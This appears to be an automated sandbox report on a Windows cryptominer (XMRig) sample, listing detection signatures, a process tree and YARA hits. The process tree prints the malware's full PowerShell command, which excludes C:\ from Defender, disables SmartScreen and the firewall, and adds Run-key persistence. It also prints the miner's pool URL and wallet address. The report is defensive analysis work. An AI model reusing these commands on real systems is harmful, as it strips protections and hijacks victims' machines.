Windows Analysis Report
2dOeahdsto
Overview
General Information
Detection
Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Uses netsh to modify the Windows network and firewall settings
Found strings related to Crypto-Mining
Query firmware table information (likely to detect VMs)
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
Creates files in the system32 config directory
May check the online IP address of the machine
Adds a directory exclusion to Windows Defender
Machine Learning detection for dropped file
Modifies the windows firewall
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Stores files to the Windows start menu directory
Too many similar processes found
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Modifies existing windows services
OS version to string mapping found (often used in BOTs)
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a start menu entry (Start Menu\Programs\Startup)
PE file contains more sections than normal
Contains functionality to retrieve information about pressed keystrokes
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Contains functionality to shutdown / reboot the system
Creates files inside the system directory
Contains functionality to execute programs as a different user
PE file contains sections with non-standard names
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Contains functionality to detect virtual machines (SLDT)
Enables security privileges
Uses taskkill to terminate processes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to simulate mouse events
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Classification
- System is w10x64
- 2dOeahdsto.exe (PID: 7136 cmdline: "C:\Users\user\Desktop\2dOeahdsto.exe" MD5: A0E067202878BD30C6B2A0583982F1FD)
- conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 4016 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit) MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- UpSys.exe (PID: 4824 cmdline: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
- UpSys.exe (PID: 4440 cmdline: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
- UpSys.exe (PID: 6980 cmdline: "C:\ProgramData\UpSys.exe" /TI/ /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
- powershell.exe (PID: 2200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- netsh.exe (PID: 6756 cmdline: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off MD5: 98CC37BBF363A38834253E22C80A8F32)
- Database.exe (PID: 6524 cmdline: --url pool.hashvault.pro:80 --user 47VtXKD1xoACvxX1aDMAmWGGESK5kD9EojKZwraNVYtE2HTwdrnhHxPbqy7MisCE3LHgYoJ6gGVL5GwiLxaxppNTV8zb92a --pass xxx MD5: EAB270D7108D82EE602CE25C64A5740F)
- cmd.exe (PID: 2828 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 6596 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 6764 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM Database.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 5124 cmdline: taskkill /IM Database.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 6560 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 3476 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 6820 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM Database.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 6952 cmdline: taskkill /IM Database.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 6876 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- Database.exe (PID: 7152 cmdline: --url pool.hashvault.pro:80 --user 47VtXKD1xoACvxX1aDMAmWGGESK5kD9EojKZwraNVYtE2HTwdrnhHxPbqy7MisCE3LHgYoJ6gGVL5GwiLxaxppNTV8zb92a --pass xxx MD5: EAB270D7108D82EE602CE25C64A5740F)
- cmd.exe (PID: 856 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 2420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 6880 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 4904 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM Database.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 6044 cmdline: taskkill /IM Database.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 6944 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 2780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 1556 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- conhost.exe (PID: 3160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 3788 cmdline: taskkill /IM Database.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- conhost.exe (PID: 1380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 5436 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 6712 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM Database.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 3392 cmdline: taskkill /IM Database.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 2936 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 4860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- Database.exe (PID: 2108 cmdline: --url pool.hashvault.pro:80 --user 47VtXKD1xoACvxX1aDMAmWGGESK5kD9EojKZwraNVYtE2HTwdrnhHxPbqy7MisCE3LHgYoJ6gGVL5GwiLxaxppNTV8zb92a --pass xxx MD5: EAB270D7108D82EE602CE25C64A5740F)
- cmd.exe (PID: 3468 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 1212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 6320 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 5068 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM Database.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- cmd.exe (PID: 2704 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 1760 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 4236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 5196 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM Database.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 6264 cmdline: taskkill /IM Database.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 7156 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 2964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 5440 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 4720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 6276 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 6216 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM Database.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 6884 cmdline: taskkill /IM Database.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 1388 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 1668 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- Database.exe (PID: 5404 cmdline: --url pool.hashvault.pro:80 --user 47VtXKD1xoACvxX1aDMAmWGGESK5kD9EojKZwraNVYtE2HTwdrnhHxPbqy7MisCE3LHgYoJ6gGVL5GwiLxaxppNTV8zb92a --pass xxx MD5: EAB270D7108D82EE602CE25C64A5740F)
- cmd.exe (PID: 5680 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM Database.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 2780 cmdline: taskkill /IM Database.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 7016 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- System.exe (PID: 6648 cmdline: "C:\ProgramData\MicrosoftNetwork\System.exe" MD5: A0E067202878BD30C6B2A0583982F1FD)
- conhost.exe (PID: 6916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 6904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit) MD5: 95000560239032BC68B4C2FDFCDEF913)
- conhost.exe (PID: 6984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- UpSys.exe (PID: 6428 cmdline: "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe MD5: EFE5769E37BA37CF4607CB9918639932)
- netsh.exe (PID: 4864 cmdline: "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off MD5: 98CC37BBF363A38834253E22C80A8F32)
- cmd.exe (PID: 1348 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 3144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 1372 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- conhost.exe (PID: 6868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 7120 cmdline: taskkill /IM Database.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 3200 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 5228 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 792 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 1372 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM Database.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- cmd.exe (PID: 5772 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 4876 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 1320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 3448 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 2992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 728 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 1332 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 2932 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 4420 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 3044 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM Database.exe /F && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 5984 cmdline: taskkill /IM Database.exe /F MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 4160 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 6588 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 1388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 3788 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- cmd.exe (PID: 5384 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- Database.exe (PID: 6408 cmdline: --url pool.hashvault.pro:80 --user 47VtXKD1xoACvxX1aDMAmWGGESK5kD9EojKZwraNVYtE2HTwdrnhHxPbqy7MisCE3LHgYoJ6gGVL5GwiLxaxppNTV8zb92a --pass xxx MD5: EAB270D7108D82EE602CE25C64A5740F)
- cmd.exe (PID: 5084 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 4200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 3268 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 6448 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 5856 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 6092 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 6124 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 4360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cmd.exe (PID: 7176 cmdline: "C:\Windows\System32\cmd.exe" /K taskkill /IM MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- taskkill.exe (PID: 7488 cmdline: taskkill /IM MD5: 530C6A6CBA137EAA7021CEF9B234E8D4)
- cmd.exe (PID: 7268 cmdline: "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
- conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- cleanup
No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | MAL_Sednit_DelphiDownloader_Apr18_2 | Detects malware from Sednit Delphi Downloader report | Florian Roth | |
| | MAL_Sednit_DelphiDownloader_Apr18_2 | Detects malware from Sednit Delphi Downloader report | Florian Roth | |
| | MAL_Sednit_DelphiDownloader_Apr18_2 | Detects malware from Sednit Delphi Downloader report | Florian Roth | |
| | MAL_Sednit_DelphiDownloader_Apr18_2 | Detects malware from Sednit Delphi Downloader report | Florian Roth | |
| | MAL_Sednit_DelphiDownloader_Apr18_2 | Detects malware from Sednit Delphi Downloader report | Florian Roth | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | MAL_Sednit_DelphiDownloader_Apr18_2 | Detects malware from Sednit Delphi Downloader report | Florian Roth | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
| | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen | |
| | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth | |
| | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security | |
No Sigma rule has matched
No Snort rule has matched
AV Detection |
---|
Source: | Avira: |
Source: | Virustotal: | Perma Link |
Source: | Metadefender: | Perma Link |
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Bitcoin Miner |
---|
Source: | File source: |
Source: | String found in binary or memory: |
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | File opened: |
Source: | Code function: | 35_2_000000014005A0D0 |
Source: | Code function: | 35_2_0000000140040EE0 |
Source: | Code function: | 35_2_000000014004F070 |
Source: | Code function: | 35_2_0000000140061180 |
Source: | Code function: | 35_2_000000014006F660 |
Source: | Code function: | 35_2_000000014008A730 |
Source: | Code function: | 35_2_000000014003EAD0 |
Source: | Code function: | 35_2_0000000140059E40 |
Source: | Code function: | 35_2_000000014006DF10 |
Networking |
---|
Source: | DNS query: |
Source: | JA3 fingerprint: |
Source: | HTTP traffic detected: |